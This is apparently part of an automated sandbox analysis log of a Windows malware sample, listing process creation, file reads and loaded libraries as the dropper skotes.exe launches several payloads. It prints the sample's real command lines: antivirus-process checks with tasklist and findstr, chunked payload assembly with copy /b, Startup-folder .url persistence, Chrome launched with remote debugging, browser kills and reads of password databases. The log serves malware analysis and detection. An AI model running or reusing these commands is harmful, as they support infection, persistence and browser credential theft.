Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000024.00000002.3103706558.00005818006EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: 3907f97605.exe, 0000001F.00000003.2881453180.0000000005A84000.00000004.00000800.00020000.00000000.sdmp, 3907f97605.exe, 0000001F.00000003.2924321266.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, 3907f97605.exe, 00000028.00000003.3413306772.0000000005591000.00000004.00000800.00020000.00000000.sdmp, 3907f97605.exe, 00000028.00000003.3383240040.00000000055C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe "C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe "C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe"
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Config Config.cmd && Config.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 662510
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cameras + ..\Webmaster + ..\Contained + ..\More + ..\Wow + ..\Kg + ..\Love + ..\Parameter + ..\Dallas + ..\Falls + ..\Principal + ..\Tft + ..\Enabling + ..\Id + ..\Raise + ..\Tests + ..\Fw + ..\Dist + ..\Optimum + ..\Editor + ..\Lady + ..\William + ..\Myers + ..\Distribution + ..\All + ..\Republicans + ..\Candidates + ..\Blond + ..\Bermuda + ..\Tablets + ..\Defend + ..\Statement + ..\Streams + ..\Extensive + ..\Ecommerce + ..\Tourist + ..\Transsexual + ..\Participation + ..\Strange + ..\Remedy + ..\Thursday + ..\Client + ..\Courts + ..\Malta + ..\Mel + ..\Quantitative A
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Ryan.com A
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process created: C:\Windows\System32\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LionGuard.url" & echo URL="C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LionGuard.url" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe "C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe"
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr "C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr" "C:\Users\user\AppData\Local\GuardTech Solutions\K"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe "C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe "C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe "C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2224,i,1451387400477687369,13867640751301481737,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe "C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe"
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe "C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe "C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe"
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe "C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe"
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe "C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe "C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe "C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe "C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe "C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe "C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe "C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Config Config.cmd && Config.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 662510 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cameras + ..\Webmaster + ..\Contained + ..\More + ..\Wow + ..\Kg + ..\Love + ..\Parameter + ..\Dallas + ..\Falls + ..\Principal + ..\Tft + ..\Enabling + ..\Id + ..\Raise + ..\Tests + ..\Fw + ..\Dist + ..\Optimum + ..\Editor + ..\Lady + ..\William + ..\Myers + ..\Distribution + ..\All + ..\Republicans + ..\Candidates + ..\Blond + ..\Bermuda + ..\Tablets + ..\Defend + ..\Statement + ..\Streams + ..\Extensive + ..\Ecommerce + ..\Tourist + ..\Transsexual + ..\Participation + ..\Strange + ..\Remedy + ..\Thursday + ..\Client + ..\Courts + ..\Malta + ..\Mel + ..\Quantitative A Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Ryan.com A Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process created: C:\Windows\System32\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LionGuard.url" & echo URL="C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LionGuard.url" & exit
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr "C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr" "C:\Users\user\AppData\Local\GuardTech Solutions\K"
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2224,i,1451387400477687369,13867640751301481737,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
